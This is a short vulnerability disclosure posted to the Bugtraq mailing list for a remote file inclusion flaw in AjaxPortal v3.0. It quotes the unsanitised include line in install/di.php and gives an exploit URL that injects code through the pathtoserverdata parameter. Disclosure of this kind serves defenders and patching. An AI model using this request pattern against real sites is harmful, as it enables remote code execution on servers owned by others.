AjaxPortal v3.0 Remote File Inclusion Vulnerability

From: Cru3l.b0y <cru3l.b0y@gmail.com>
To: bugtraq@securityfocus.com
Cc:
Subject: AjaxPortal v3.0 Remote File Inclusion Vulnerability
Date:

Attachments:
AjaxPortal.txt

Hi Dear,
I found a new bug. please publish it.
Best Regards.

/===============================================================================================================================================\
  |                                                                                                                                                                                              |
  |  [o] AjaxPortal v3.0 Remote File Inclusion Vulnerability                                                                     |
  |                                                                                                                                                                                              |
  |       Software : AjaxPortal v3.0                                                                                                                     |
  |       Vendor   : http://myiosoft.com/download/AjaxPortal/ajaxportal-30.zip                    |
  |       Author   : Cru3l.b0y                                                                                                                              |
  |       Contact  : Cru3l.b0y@deltahacking.net                                                                                              |
  |                  Home     : WwW.DeltaHacking.Net
  |===============================================================================================================================================|
  |                                                                                                                                                                                               |
  |  [o] Vulnerable file                                                                                                                                             |
  |                                                                                                                                                                                                  |
  |       install/di.php                                                                                                     |
  |                                                                                                                                                                                                  |
  |        include $pathtoserverdata."serverdata.php";                                             |     
                                                                                                                                                                                            |
  |  [o] Exploit                                                                                                                                                                 |
  |                                                                                                                                                                                                  |
  |       http://localhost/[path]/install/di.php?pathtoserverdata=[evilcode]                      |
 



Copyright © 1995-2018 LinuxRocket.net. All rights reserved.